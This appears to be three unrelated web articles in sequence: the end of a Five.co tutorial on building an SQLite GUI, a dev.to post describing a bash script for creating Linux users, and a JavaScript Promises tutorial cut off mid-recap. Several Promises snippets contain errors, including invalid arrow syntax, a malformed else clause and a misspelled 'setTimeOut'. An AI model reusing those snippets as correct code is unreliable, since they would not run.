href="https://five.co/blog/build-apps-on-external-database/">external databases </a>such as SQLite.</li> <!-- /wp:list-item --> <!-- wp:list-item --> <li><strong>Extensibility</strong>: Enhance applications using <a href="https://five.co/blog/how-to-execute-a-query-in-sql-using-queries-and-data-views/">SQL</a>, <a href="https://five.co/blog/javascript-typescript-functions-inside-five/">JavaScript</a>, and TypeScript.</li> <!-- /wp:list-item --> <!-- wp:list-item --> <li><strong>Front-End</strong>: Employ Material-UI from the popular React component library for auto-generated front-end development.</li> <!-- /wp:list-item --> <!-- wp:list-item --> <li><strong>Deployment</strong>: Deploy your GUI effortlessly to a scalable infrastructure as containerized web applications using <a href="https://www.docker.com/">Docker</a> and <a href="https://kubernetes.io/">Kubernetes</a>.</li> <!-- /wp:list-item --></ul> <!-- /wp:list --> <!-- wp:separator --> <hr class="wp-block-separator has-alpha-channel-opacity"/> <!-- /wp:separator --> <!-- wp:heading {"level":3} --> <h3 class="wp-block-heading">Why Choose Five Over an Open-Source Software Stack?</h3> <!-- /wp:heading --> <!-- wp:paragraph --> <p>Developers might wonder why they should use Five instead of traditional stacks like MEAN, MERN, or LAMP. Here’s why:</p> <!-- /wp:paragraph --> <!-- wp:list {"ordered":true} --> <ol><!-- wp:list-item --> <li><strong>Faster Development</strong>:<!-- wp:list --> <ul><!-- wp:list-item --> <li>With Five, developers can start building applications immediately without spending time on environment setup. This leads to quicker development cycles.</li> <!-- /wp:list-item --></ul> <!-- /wp:list --></li> <!-- /wp:list-item --> <!-- wp:list-item --> <li><strong>Comprehensive Toolset</strong>:<!-- wp:list --> <ul><!-- wp:list-item --> <li>Five provides all necessary tools for building, maintaining, and deploying applications within its environment. There's no need for external SQL script creation, component library searches, or navigating cloud deployment consoles. Five includes everything required, streamlining the development process and supporting full-code extensibility through SQL, JavaScript, or TypeScript. Popular technologies like webhooks and APIs are also supported.</li> <!-- /wp:list-item --></ul> <!-- /wp:list --></li> <!-- /wp:list-item --> <!-- wp:list-item --> <li><strong>Ease of Use for All Developers</strong>:<!-- wp:list --> <ul><!-- wp:list-item --> <li>Back-end developers can easily create front-ends without needing expertise in typical front-end or back-end tools. Developers of any specialization—front-end, back-end, or full-stack—can deploy applications to the cloud effortlessly, even without cloud expertise. Five simplifies the entire process, making it accessible and user-friendly.</li> <!-- /wp:list-item --></ul> <!-- /wp:list --></li> <!-- /wp:list-item --></ol> <!-- /wp:list --> <!-- wp:separator --> <hr class="wp-block-separator has-alpha-channel-opacity"/> <!-- /wp:separator --> <!-- wp:heading --> <h2 class="wp-block-heading">How to Create an SQLite GUI:</h2> <!-- /wp:heading --> <!-- wp:list {"ordered":true} --> <ol><!-- wp:list-item --> <li><strong>Create a New Application</strong>:<!-- wp:list --> <ul><!-- wp:list-item --> <li>Start by creating a new application within Five.</li> <!-- /wp:list-item --></ul> <!-- /wp:list --></li> <!-- /wp:list-item --> <!-- wp:list-item --> <li><strong>Connect to SQLite</strong>:<!-- wp:list --> <ul><!-- wp:list-item --> <li>Provide a connection string to the SQLite database <a href="https://five.co/order-payment/">(note: this feature is part of a paid plan).</a></li> <!-- /wp:list-item --></ul> <!-- /wp:list --></li> <!-- /wp:list-item --> <!-- wp:list-item --> <li><strong>Form Creation</strong>:<!-- wp:list --> <ul><!-- wp:list-item --> <li>Use Five to create the necessary forms for your application.</li> <!-- /wp:list-item --></ul> <!-- /wp:list --></li> <!-- /wp:list-item --> <!-- wp:list-item --> <li><strong>Launch the Application</strong>:<!-- wp:list --> <ul><!-- wp:list-item --> <li>Deploy your application with a single click, leveraging Five’s scalable infrastructure.</li> <!-- /wp:list-item --></ul> <!-- /wp:list --></li> <!-- /wp:list-item --></ol> <!-- /wp:list --> <!-- wp:paragraph --> <p>With Five, developers gain access to an all-in-one development tool that extends beyond a traditional IDE, facilitating rapid and efficient application development and deployment.</p> <!-- /wp:paragraph --> <!-- wp:tadv/classic-paragraph --> <div style="background-color: #001524;"><hr style="height: 5px;" /> <pre style="text-align: center; overflow: hidden; white-space: pre-line;"><span style="color: #f1ebda; background-color: #4588d8; font-size: calc(18px + 0.390625vw);"><strong>Create An SQLite GUI</strong> <span style="font-size: 14pt;">Get Free Access of Five to Follow this Tutorial</span></span></pre> <p style="text-align: center;"><a href="https://five.co/get-started/" target="_blank" rel="noopener"><button style="background-color: #f8b92b; border: none; color: black; padding: 20px; text-align: center; text-decoration: none; display: inline-block; font-size: 18px; cursor: pointer; margin: 4px 2px; border-radius: 5px;"><strong>Get Instant Access</strong></button><br /></a></p> <hr style="height: 5px;" /></div> <!-- /wp:tadv/classic-paragraph --> <!-- wp:heading {"level":3} --> <h3 class="wp-block-heading">Building a New Application With Five</h3> <!-- /wp:heading --> <!-- wp:paragraph --> <p>Let's start by creating a new application with Five. To do so, <a href="https://five.co/get-started/">access our free access version</a>. The first screen you will see looks like this. </p> <!-- /wp:paragraph --> <!-- wp:image {"align":"center","id":3144,"sizeSlug":"full","linkDestination":"none"} --> <figure class="wp-block-image aligncenter size-full"><img src="https://five.co/wp-content/uploads/2024/06/Five.Co-Landing-Page-1024x649-1-1.png" alt="" class="wp-image-3144"/></figure> <!-- /wp:image --> <!-- wp:separator --> <hr class="wp-block-separator has-alpha-channel-opacity"/> <!-- /wp:separator --> <!-- wp:list {"ordered":true} --> <ol><!-- wp:list-item --> <li><strong>Access the Application Menu</strong>:<!-- wp:list --> <ul><!-- wp:list-item --> <li>Click on the "Applications" option located in the top left corner.</li> <!-- /wp:list-item --></ul> <!-- /wp:list --></li> <!-- /wp:list-item --> <!-- wp:list-item --> <li><strong>Create a New Application</strong>:<!-- wp:list --> <ul><!-- wp:list-item --> <li>Click on the yellow Plus button to start a new application.</li> <!-- /wp:list-item --></ul> <!-- /wp:list --></li> <!-- /wp:list-item --> <!-- wp:list-item --> <li><strong>Name Your Application</strong>:<!-- wp:list --> <ul><!-- wp:list-item --> <li>Enter a descriptive name in the Title field. Save your new application by clicking the tick mark in the top right corner.</li> <!-- /wp:list-item --></ul> <!-- /wp:list --></li> <!-- /wp:list-item --></ol> <!-- /wp:list --> <!-- wp:image {"align":"center","id":3145,"sizeSlug":"full","linkDestination":"none"} --> <figure class="wp-block-image aligncenter size-full"><img src="https://five.co/wp-content/uploads/2024/06/image-31-1024x617-1.png" alt="" class="wp-image-3145"/></figure> <!-- /wp:image --> <!-- wp:paragraph --> <p>Once saved, you will see your newly created application listed among all your Five applications.</p> <!-- /wp:paragraph --> <!-- wp:separator --> <hr class="wp-block-separator has-alpha-channel-opacity"/> <!-- /wp:separator --> <!-- wp:list {"ordered":true,"start":4} --> <ol start="4"><!-- wp:list-item --> <li><strong>Manage Your Application</strong>:<!-- wp:list --> <ul><!-- wp:list-item --> <li>Click on the blue "Manage" button that appears in the top right corner to access Five's development features.</li> <!-- /wp:list-item --></ul> <!-- /wp:list --></li> <!-- /wp:list-item --></ol> <!-- /wp:list --> <!-- wp:image {"align":"center","id":3146,"sizeSlug":"large","linkDestination":"none"} --> <figure class="wp-block-image aligncenter size-large"><img src="https://five.co/wp-content/uploads/2024/06/Five.Co-Manage-Your-Application-2-1024x576.png" alt="" class="wp-image-3146"/></figure> <!-- /wp:image --> <!-- wp:separator --> <hr class="wp-block-separator has-alpha-channel-opacity"/> <!-- /wp:separator --> <!-- wp:paragraph --> <p><strong>EXPERT TIP</strong>: Initially, don’t worry about customizing all the application settings. There are many options for configuring multi-user access, application logs, and buttons. For now, stick with the default settings. Creating a new application gives you access to everything needed to start building your SQLIite GUI.</p> <!-- /wp:paragraph --> <!-- wp:separator --> <hr class="wp-block-separator has-alpha-channel-opacity"/> <!-- /wp:separator --> <!-- wp:heading {"level":3} --> <h3 class="wp-block-heading">Creating a Database with Five</h3> <!-- /wp:heading --> <!-- wp:paragraph --> <p>Next, let's create a MySQL database within Five.</p> <!-- /wp:paragraph --> <!-- wp:paragraph --> <p><strong>Why MySQL Instead of SQLite?</strong></p> <!-- /wp:paragraph --> <!-- wp:paragraph --> <p>Connecting Five to an external database like SQLite requires a paid subscription. However, Five includes a free integrated <a href="https://five.co/blog/how-to-create-a-front-end-for-a-mysql-database/">MySQL database</a> GUI, allowing you to create and manage a MySQL database without needing additional tools. This is a great way to familiarize yourself with Five’s features before committing to a paid plan.</p> <!-- /wp:paragraph --> <!-- wp:paragraph --> <p>Applications created with Five’s free version utilize the built-in MySQL database. You can manage this database directly within Five, without the need for external tools like dbForge Studio, phpMyAdmin, MySQL Workbench, Navicat for MySQL, DBeaver, or Beekeeper Studio.</p> <!-- /wp:paragraph --> <!-- wp:paragraph --> <p>If you want to purchase a paid plan right away and use your SQLite database, <a href="https://five.co/order-payment/">you can purchase a paid plan here</a>.</p> <!-- /wp:paragraph --> <!-- wp:separator --> <hr class="wp-block-separator has-alpha-channel-opacity"/> <!-- /wp:separator --> <!-- wp:heading {"level":3} --> <h3 class="wp-block-heading">Creating Database Tables</h3> <!-- /wp:heading --> <!-- wp:paragraph --> <p>To create new MySQL database tables in Five:</p> <!-- /wp:paragraph --> <!-- wp:list --> <ul><!-- wp:list-item --> <li><strong>Access the Data Management Tools</strong>:<!-- wp:list --> <ul><!-- wp:list-item --> <li>Click on "Manage," then select "Data," and finally, "Table Wizard."</li> <!-- /wp:list-item --></ul> <!-- wp:image {"align":"center","id":3149,"sizeSlug":"full","linkDestination":"none"} --> <figure class="wp-block-image aligncenter size-full"><img src="https://five.co/wp-content/uploads/2024/06/Five.Co-Table-Wizard-1024x649-2.png" alt="" class="wp-image-3149"/></figure> <!-- /wp:image --> <!-- wp:list --> <ul><!-- wp:list-item --> <li><strong>Using the Table Wizard</strong>:<!-- wp:list --> <ul><!-- wp:list-item --> <li>Create new database tables from scratch.</li> <!-- /wp:list-item --> <!-- wp:list-item --> <li>Assign data and display types to fields, determining how data is stored and presented to users.</li> <!-- /wp:list-item --> <!-- wp:list-item --> <li>Establish relationships between tables using Primary and Foreign Keys.</li> <!-- /wp:list-item --> <!-- wp:list-item --> <li>Import CSV files directly into your database tables.</li> <!-- /wp:list-item --> <!-- wp:list-item --> <li>Add new fields to existing tables.</li> <!-- /wp:list-item --></ul> <!-- wp:paragraph --> <p>To add new fields, click on the Plus icon, define their data and display types, set their size, and you’re done.</p> <!-- /wp:paragraph --> <!-- wp:image {"align":"center","id":3147,"sizeSlug":"full","linkDestination":"none"} --> <figure class="wp-block-image aligncenter size-full"><img src="https://five.co/wp-content/uploads/2024/06/Five.Co-Create-a-Table-with-the-Table-Wizard-1024x627-1.png" alt="" class="wp-image-3147"/></figure> <!-- /wp:image --> <!-- wp:paragraph --> <p>By following these steps, you can effectively create and manage your database within Five, making it a great tool for developing your web applications.</p> <!-- /wp:paragraph --> <!-- wp:separator --> <hr class="wp-block-separator has-alpha-channel-opacity"/> <!-- /wp:separator --> <!-- wp:paragraph --> <p>For a quick tutorial on how to create your first database table, <a href="https://help.five.org/docs/training/quick-start-guide/build-database-tables">follow our Quick Start Guide that walks you through setting up database tables, as well as building relationships between them.</a></p> <!-- /wp:paragraph --> <!-- wp:paragraph {"align":"left"} --> <p class="has-text-align-left">Or watch this YouTube video that explains Five's Table Wizard:</p> <!-- /wp:paragraph --> <!-- wp:embed {"url":"https://www.youtube.com/watch?v=jcRAhyw9rmI","type":"video","providerNameSlug":"youtube","responsive":true,"align":"center","className":"wp-embed-aspect-16-9 wp-has-aspect-ratio"} --> <figure class="wp-block-embed aligncenter is-type-video is-provider-youtube wp-block-embed-youtube wp-embed-aspect-16-9 wp-has-aspect-ratio"><div class="wp-block-embed__wrapper"> https://www.youtube.com/watch?v=jcRAhyw9rmI </div></figure> <!-- /wp:embed --> <!-- wp:separator --> <hr class="wp-block-separator has-alpha-channel-opacity"/> <!-- /wp:separator --> <!-- wp:paragraph --> <p><strong>Expert Tip: Simplified <a href="https://help.five.org/2.6/docs/data/table-wizard/create-table-relationships/">Table Relationships</a> and Keys in Five</strong></p> <!-- /wp:paragraph --> <!-- wp:paragraph --> <p>When you create a relationship between tables in Five, the platform automatically generates primary and foreign key fields for you. For instance, when you create a new table, Five adds a primary key field named "TableNameKey" as a GUID. This means you don't need to manually create a primary key field.</p> <!-- /wp:paragraph --> <!-- wp:paragraph --> <p>To view your database schema and relationships, navigate to <strong>Data</strong> and select <strong>Database Modeler.</strong> This tool visually represents your database schema, including all tables and their interconnections.</p> <!-- /wp:paragraph --> <!-- wp:separator --> <hr class="wp-block-separator has-alpha-channel-opacity"/> <!-- /wp:separator --> <!-- wp:heading {"level":3} --> <h3 class="wp-block-heading"><strong>Creating Forms with Five</strong></h3> <!-- /wp:heading --> <!-- wp:paragraph --> <p>After setting up your database tables, you can start creating forms. Go to <strong>Visual</strong> and then click on <strong>Form</strong> Wizard in the top menu.</p> <!-- /wp:paragraph --> <!-- wp:image {"align":"center","id":3150,"sizeSlug":"full","linkDestination":"none"} --> <figure class="wp-block-image aligncenter size-full"><img src="https://five.co/wp-content/uploads/2024/06/Five.Co-Form-Wizard-1024x650-5.png" alt="" class="wp-image-3150"/></figure> <!-- /wp:image --> <!-- wp:paragraph --> <p>Within the Form Wizard, choose the database table that your new form will be associated with. For example, if your database has a table named "Inventory," you can select this table in the wizard, which will automatically generate the necessary fields for user interaction.</p> <!-- /wp:paragraph --> <!-- wp:image {"align":"center","id":3151,"sizeSlug":"full","linkDestination":"none"} --> <figure class="wp-block-image aligncenter size-full"><img src="https://five.co/wp-content/uploads/2024/06/Five.Co-Form-Wizard-Creating-a-form-1024x656-1-1.png" alt="" class="wp-image-3151"/></figure> <!-- /wp:image --> <!-- wp:paragraph --> <p>Building a form from a database table typically takes just a few seconds. Five’s integration with MySQL simplifies the creation of CRUD applications. Watch this video to create your first form.</p> <!-- /wp:paragraph --> <!-- wp:embed {"url":"https://www.youtube.com/watch?v=C-P0vgwrU6s","type":"video","providerNameSlug":"youtube","responsive":true,"align":"center","className":"wp-embed-aspect-16-9 wp-has-aspect-ratio"} --> <figure class="wp-block-embed aligncenter is-type-video is-provider-youtube wp-block-embed-youtube wp-embed-aspect-16-9 wp-has-aspect-ratio"><div class="wp-block-embed__wrapper"> https://www.youtube.com/watch?v=C-P0vgwrU6s </div></figure> <!-- /wp:embed --> <!-- wp:paragraph --> <p>Five offers various customization options for forms, including:</p> <!-- /wp:paragraph --> <!-- wp:list --> <ul><!-- wp:list-item --> <li>Adjusting the size and order of form fields.</li> <!-- /wp:list-item --> <!-- wp:list-item --> <li>Using conditional logic with "Show If," "Read Only If," or "Required If" and JavaScript conditions.</li> <!-- /wp:list-item --> <!-- wp:list-item --> <li>Creating custom display types and validating data with regular expressions (RegEx).</li> <!-- /wp:list-item --> <!-- wp:list-item --> <li>Assigning events to user actions, such as running a JavaScript function on field entry or exit.</li> <!-- /wp:list-item --></ul> <!-- /wp:list --> <!-- wp:paragraph --> <p>In a nutshell, there is little that you <em>cannot</em> do with a form built inside of Five. But if you still have questions, then our <a href="https://five.org">user community</a> is a good place to learn more about Five's features.</p> <!-- /wp:paragraph --> <!-- wp:separator --> <hr class="wp-block-separator has-alpha-channel-opacity"/> <!-- /wp:separator --> <!-- wp:paragraph --> <p><strong>Expert Tip:</strong> Start with a basic form and explore customization options as needed. Initially, focus on functionality, ensuring that your form allows user interaction with your database. You can refine the form's appearance and functionality later.</p> <!-- /wp:paragraph --> <!-- wp:separator --> <hr class="wp-block-separator has-alpha-channel-opacity"/> <!-- /wp:separator --> <!-- wp:heading {"level":3} --> <h3 class="wp-block-heading"><strong>Launching Your Application</strong></h3> <!-- /wp:heading --> <!-- wp:paragraph --> <p>After setting up a table and a form, you can launch your application. Click the "Run" button in the top-right corner to preview your application in a new tab.</p> <!-- /wp:paragraph --> <!-- wp:image {"align":"center","id":3152,"sizeSlug":"large","linkDestination":"none"} --> <figure class="wp-block-image aligncenter size-large"><img src="https://five.co/wp-content/uploads/2024/06/Five.Co-Run-Your-Application-4-1024x576.png" alt="Build an SQLite GUI today" class="wp-image-3152"/></figure> <!-- /wp:image --> <!-- wp:paragraph --> <p>Five automatically generates a user-friendly <a href="https://five.co/blog/the-admin-panel-the-best-web-app-template/">admin panel</a> interface for your MySQL database. This interface includes a navigational menu, in-app help icons, a user avatar for multi-user applications, and a central area for user interaction with forms, charts, dashboards, and other elements.</p> <!-- /wp:paragraph --> <!-- wp:paragraph --> <p>The interface is customizable with themes, buttons, and custom front-end components, and it can handle complex data structures with pages, drill-downs, and parent-child menus.</p> <!-- /wp:paragraph --> <!-- wp:separator --> <hr class="wp-block-separator has-alpha-channel-opacity"/> <!-- /wp:separator --> <!-- wp:heading {"level":3} --> <h3 class="wp-block-heading"><strong>Understanding Five's User Interface</strong></h3> <!-- /wp:heading --> <!-- wp:paragraph --> <p>Five’s user interface is designed for data-driven, multi-user business applications, from internal tools to CRM or OMS systems. It allows end-users to store, amend, view, visualize, report, and query data.</p> <!-- /wp:paragraph --> <!-- wp:paragraph --> <p>Five includes a variety of UI components for data display, such as ratings, date pickers, and radio buttons. The UI is responsive, adjusting to different screen sizes from mobile phones to desktops.</p> <!-- /wp:paragraph --> <!-- wp:paragraph --> <p>Overall, Five’s user interface is designed to accelerate application development without compromising the end-user experience.</p> <!-- /wp:paragraph --> <!-- wp:separator --> <hr class="wp-block-separator has-alpha-channel-opacity"/> <!-- /wp:separator --> <!-- wp:paragraph --> <p><strong>Expert Tip:</strong> While Five’s UI is responsive by default, developers should consider the end-user experience. For example, when designing dashboards, use a custom grid with a minimal number of columns and rows for mobile devices to enhance usability.</p> <!-- /wp:paragraph --> <!-- wp:separator --> <hr class="wp-block-separator has-alpha-channel-opacity"/> <!-- /wp:separator --> <!-- wp:heading {"level":3} --> <h3 class="wp-block-heading">Connecting Five To An Existing SQLite Database</h3> <!-- /wp:heading --> <!-- wp:paragraph --> <p>To connect Five to an existing SQLite database, <a href="https://five.co/order-payment/">subscribe to Five's paid plan</a>. This gives you access to a web-hosted development environment. Supply Five with a connection string, and Five will treat your existing database as a data source.</p> <!-- /wp:paragraph --> <!-- wp:paragraph --> <p>To do so, follow these steps:</p> <!-- /wp:paragraph --> <!-- wp:paragraph --> <p>First, provide the connection string to establish the database connection inside Five's <strong>Database </strong>menu.&nbsp;</p> <!-- /wp:paragraph --> <!-- wp:paragraph --> <p>The connection string represents a set of parameters in the form of&nbsp;<em>key = value</em>&nbsp;pairs separated by semicolons.</p> <!-- /wp:paragraph --> <!-- wp:table --> <figure class="wp-block-table"><table><tbody><tr><td><strong>Key</strong></td><td><strong>Value</strong></td></tr><tr><td><strong>Driver&nbsp;</strong></td><td>The database driver allows you to interact with your chosen DBMS through Five’s interface.</td></tr><tr><td><strong>URL&nbsp;</strong></td><td>A database connection URL provides a way of identifying a database so that the selected driver recognizes it and connects to it.</td></tr><tr><td><strong>Username&nbsp;</strong></td><td>Your username.</td></tr><tr><td><strong>Password&nbsp;</strong></td><td>Your password.</td></tr><tr><td><strong>Name&nbsp;</strong></td><td>The name of your database.</td></tr></tbody></table></figure> <!-- /wp:table --> <!-- wp:paragraph --> <p>Once your connection string is saved, Five will add your existing database as a data source, and you can use Five to develop a front end including forms, <a href="https://five.co/blog/how-to-build-charts-using-the-chart-wizard/" data-type="post" data-id="2183">charts</a>, <a href="https://five.co/blog/generate-mysql-report/" data-type="post" data-id="1786">reports</a>, or <a href="https://five.co/blog/how-to-create-custom-dashboards/" data-type="post" data-id="2198">dashboards </a>on your SQLite database. </p> <!-- /wp:paragraph --> <!-- wp:separator --> <hr class="wp-block-separator has-alpha-channel-opacity"/> <!-- /wp:separator --> <!-- wp:heading --> <h2 class="wp-block-heading"><strong>Conclusion &amp; Next Steps</strong>: Build An SQLite GUI</h2> <!-- /wp:heading --> <!-- wp:paragraph --> <p>In this article, we covered how to create a GUI for an SQLite database using Five.</p> <!-- /wp:paragraph --> <!-- wp:paragraph --> <p>Five is ideal for building custom business applications. It simplifies the process of creating a front end for any relational database, including SQLite, and provides developers with a pre-built user interface.</p> <!-- /wp:paragraph --> <!-- wp:paragraph --> <p>Now that you have learned how to build a GUI for your SQLite database, where should you take your application next? We have only covered the basics of Five. To continue developing your application, consider the following:</p> <!-- /wp:paragraph --> <!-- wp:list --> <ul><!-- wp:list-item --> <li><strong>Making it a Multi-User Application:</strong> Create different access rights and permissions for various user groups.</li> <!-- /wp:list-item --> <!-- wp:list-item --> <li><strong>Adding a Mail Merge:</strong> Notify users about changes within your application.</li> <!-- /wp:list-item --> <!-- wp:list-item --> <li><strong>Writing SQL Queries:</strong> Use Five to create reports, charts, or dashboards.</li> <!-- /wp:list-item --> <!-- wp:list-item --> <li><strong>Integrating with External Systems:</strong> Add JavaScript functions to connect Five to external systems, such as Slack.</li> <!-- /wp:list-item --></ul> <!-- /wp:list --> <!-- wp:paragraph --> <p>To continue building out your web application and adding more features check out this <a href="https://five.co/code-along/code-along-full-stack-web-app/">Code-Along: Build &amp; Deploy a Full-Stack Web App</a></p> <!-- /wp:paragraph -->
domfive
1,906,976
Linux User Creation Bash Script
Hello everyone, I am Kahuna, and I’m excited to share my latest technical article. As a DevOps...
0
2024-06-30T22:59:25
https://dev.to/kahuna04/linux-user-creation-bash-script-1p97
backenddevelopment, bash, devops
Hello everyone, I am Kahuna, and I’m excited to share my latest technical article. As a DevOps engineer, I was asked to manage user accounts and groups. Today, I’ll walk you through a script I wrote to automate this process. This script reads a text file containing usernames and their respective groups, creates users and groups as specified. ##Prerequisites I ensured I have the necessary permissions to create users and groups, and write to the /var/log/ and /var/secure/ directories. ##The Script Here’s a breakdown of the create_users.sh script: ###Log and Password Files: The script uses /var/log/user_management.log for logging actions and /var/secure/user_passwords.csv to securely store generated passwords. The /var/secure/ directory is set with restrictive permissions to ensure password security. ###Input Validation: The script checks if an input file is provided and exits with usage instructions if not. ###Logging Function: A simple function logs messages with timestamps to the log file. ###Password Generation: A function generates random 12-character passwords using /dev/urandom. ###Processing the Input File: The script reads each line of the input file, extracts the username and groups, and processes them: - User Existence Check: If the user already exists, it logs the information and skips to the next line. - User Creation: It creates the user with the specified personal group and a home directory. - Additional Groups: If additional groups are specified, the script creates them if they don’t exist and adds the user to these groups. - Password Setting: It generates and sets a random password for the user and logs this action. ##Running the Script To run the script, I have saved it as create_users.sh, and I have provided the input file as an argument: ``` chmod +x create_users.sh sudo ./create_users.sh employee_file ``` ####Input File Here’s the input file (employee_file) looks like: ``` Kahuna; Backend,DevOps,HR Dami; DevOps,HR Sola; Backend ``` ###Conclusion This script automates the process of creating and managing users and groups, ensuring consistency and security. I am currently on a DevOps journey with HNG Internship. To learn more, check [HNG Internship](https://hng.tech/internship) and [HNG Premium](https://hng.tech/premium).
kahuna04
732,756
Promises in JavaScript
Hope you had a great break before continuing the series! In this article, we would cover Promises....
13,306
2021-06-20T07:14:11
https://dev.to/mehmehmehlol/promises-in-javascript-2li
beginners, javascript
Hope you had a great break before continuing the series! In this article, we would cover `Promises`. If you haven't read the previous article ([Intro to Asynchronous JS](https://dev.to/mehmehmehlol/intro-to-asynchronous-javascript-g9e)), I highly recommend you to first read it before coming back to this article, as it builds an important foundation for this article. <img src="https://i.pinimg.com/originals/c9/0a/98/c90a989fcf6b4d55d44ebd367705fc38.gif" alt="coffee dive" /> There are 4 parts in this series: 1. Intro to Asynchronous JS 2. `Promises` (this article) 3. More `Promises` 4. `async/await` ## Introduction `Promises` was introduced in ES6 to simplify asynchronous programming. I would divide this article into the following sections: - Why was `Promises` introduced? (Spoiler Alert: Trouble with callbacks) - Promise Terminology - Basic Promise usage - Promise Consumer: `then`, `catch`, `finally` In the next article, we'll cover: - Chaining Promise - Fulfilling multiple Promises ## Before Promises: Old-style Callbacks Before the introduction of `Promises` in ES6, asynchronous was commonly handled with **callbacks** (calling a function within another function). This is important to know before diving into `Promises`. Let's see some callback example. Imagine you are ordering Starbucks coffee on a Monday morning and you are feeling cranky. Unfortunately, you don't just get your coffee with a snap. <img src="https://media1.giphy.com/media/iIFS20pNoCg1EEVodC/giphy.gif" alt="Thanos snap"/> You have to first decide what kind of coffee you want, then you place your order with the barista, then you get your coffee, last but not least, <img src="https://www.memesmonkey.com/images/memesmonkey/7c/7cc3990d5ba24d64dc252f38c26512e2.jpeg" alt="monkey sipping meme" /> Here's how the callback's going to look like (reference to <a href="https://developer.mozilla.org/en-US/docs/Learn/JavaScript/Asynchronous/Promises">MDN doc on Promise</a>): ```javascript chooseCoffee(function(order) { placeOrder(order, function(coffee) { drinkCoffee(coffee); }, failureCallback); }, failureCallback); ``` As you can see, it's very messy-looking! This is what is often referred to as "<a href="http://callbackhell.com/">callback-hell</a>". `Promises` allow these kinds of nested callbacks to be re-expressed as **Promise chain**, which we would cover more in the next article. In the following section, we would first cover the terminology, then we'll dive into the basic Promise usage using the callback functions we saw in the series. ## Promise Terminology Here's the basic syntax of `Promise`: ```javascript let promise = new Promise(function(resolve, reject) { // executor }); ``` The arguments `resolve` and `reject` are the two callbacks provided by JavaScript. Here are the three states in a promise you need to know: 1. **pending**: when a promise is created, it is neither in success or failure state. 2. **resolved**: when a promise returns, it is said to be **resolved**. 3. **fulfilled**: when a promise is successfully resolved. It returns a value, which can be accessed by chaining a `.then` block onto the end of the promise chain (will discuss this later in the article) 4. **rejected**: when a promise is unsuccessfully resolved. It returns a reason, an error message why it is rejected (`Error: Error here`). This can be accessed by chaining a `.catch` block onto the end of the promise chain. Here's a more visual graph from [javascript.info](https://javascript.info/promise-basics) ![Promise graph](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/51xpczm8qnorssbxm7zk.png) ## Basic Promise usage In a promise, there can be only one result or error. So let's say we have this Promise function: ```javascript let promise = new Promise(function(resolve, reject) { resolve("done"); reject(new Error("Not okay!")); // ignored }) ``` The result will immediately show "done" and the error will be ignored. This is the easy version. This is what you can expect how a promise will look like: ```javascript let example = () => { return new Promise(function(resolve, reject) => { let value = function1(); if (job success) { resolve(value); } else (job unsuccessful) { reject(console.log("something's wrong!! :(")); } }).then(function(value)) { // success return nextFunction(value); }).catch(rejectFunction); } ``` Okay, it's getting a lot and we've got some new friends in the above function. What's `.then` and `.catch`? We will get to them in the next section, but just a quick breakdown from above: - As a promise is created, if the function is passed successfully, the promise will be resolved. - On the other hand, if the function is passed unsuccessfully, the promise will be rejected and "something's wrong!! :(" will be printed on the console. This is all you need to know for now! Let's move to our consumers in `Promises`! ## Consumers: `.then`, `.catch`, `.finally` A Promise object serves as a connection between the executor (you know the `resolve`, `reject`) and the consuming functions. Consuming functions can be registered with methods: `then`, `catch`, `finally` (which you've already seen `.then` and `.catch` in the previous section!). Here's the promise cycle: 1️⃣ A promise is created (State: Pending) 2️⃣ a 👉🏻 A promise is **resolved** (State: resolved) 👉🏻 Promise chain with `.then` 2️⃣ b 👉🏻 A promise is **rejected** (State: rejected) 👉🏻 `.catch` to handle errors 3️⃣ `.finally` to give the final result of the promise 💯 ### `.then` As I learned how to use these consumer methods, I like to think `.then` as... *then* what would you like to do after we **resolved** the promise? Consider `.then` is similar to `AddEventListener()`. It doesn't run until an event occurs (i.e. the promise is resolved). ```javascript let promise = new Promise(function(resolve, reject) { setTimeOut(() => resolve("done!!"), 1000); }); promise.then( // shows "done!" in console after 1 second result => console.log(result) ); ``` Note: You can show errors using `.then`. ### `.catch`: Error Handling Promises is not always resolved, but there are cases where promises is rejected. Therefore `.catch` is here to *catch* errors. Here's how we remember: - `.then` works when a promise is **resolved**. - `.catch` works when a promise is **rejected**. If we are interested in seeing errors, here's how we use `.catch`: ```javascript let promise = new Promise(function(resolve, reject) { setTimeOut(() => reject(new Error("NO!")), 1000); }); // shows the error after 1 second promise.catch(result => console.log(result)); ``` Feel free to copy the code above to your terminal/Chrome DevTool (if you are using Chrome). You should see the following: ![.catch demo](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/t3vgw4h232k8qoia3e55.png) Note: `.then(null, func)` is the same as `.catch(func)` ### `.finally` `.finally`, which is introduced in ES2018, is like a decent closure for the promise. Think of it like *finally* we are done and it's time to disclose the *final* result. In other words, it works no matter the promise is resolved or rejected. `.finally` is a good handler for performing cleanup, like stopping the loading indicator. If a promise is resolved: ```javascript let promise = new Promise((resolve, reject) => { setTimeout(() => resolve("done!"), 2000); }) promise.finally(() => console.log("Promise ready")); promise.then(result => console.log(result)); ``` Quick Demo: ![resolved promise finally demo](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/uafpfxdtw1jo4dpmoomx.gif) If a promise is rejected: ```javascript let promise = new Promise((resolve, reject) => { throw new Error("error"); }) promise.finally(() => console.log("Promise ready")) promise.catch(err => console.log(err)); ``` Quick Demo: ![rejected promise finally demo](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/8fkuz5r37bvcanaqmoai.gif) Well let's put all these together, shall we? Let's apply our new knowledge to our Monday morning coffee from the callback-hell section, but I will add one more condition is that we will only buy coffee if our mood rates lower than or equal to 5 (out of 10): ```javascript function orderCoffee() { return new Promise((resolve, reject) => { let rating = Math.random() * 10; // this is only a reference so that // we know what the rate of mood is console.log(rating); if (rating > 5) { resolve("I AM FEELING GREAT!"); } else { reject(new Error("We are going to Starbucks...")); } }); } orderCoffee() .then(mood => console.log(mood)) .catch(err => console.log(err)) .finally(() => console.log("Decision's been made!")); ``` (Code reference from MDN's [Promise.prototype.finally()](https://developer.mozilla.org/en-US/docs/Web/JavaScript/Reference/Global_Objects/Promise/finally)) If the mood rates higher than 5 (i.e. the promise is resolved) (You can see the number on the first line after the handlers): ![Resolved Promise Coffee Example](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/9l5kwngkyglo13cmvcvm.gif) If the mood rates lower than or equal to 5 (i.e. the promise is rejected): ![Rejected Promise Coffee Example](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/68urqlacu8250iyyekyi.gif) Feel free to copy the code above on your ChromeDevTool/terminal to play around!! A quick recap 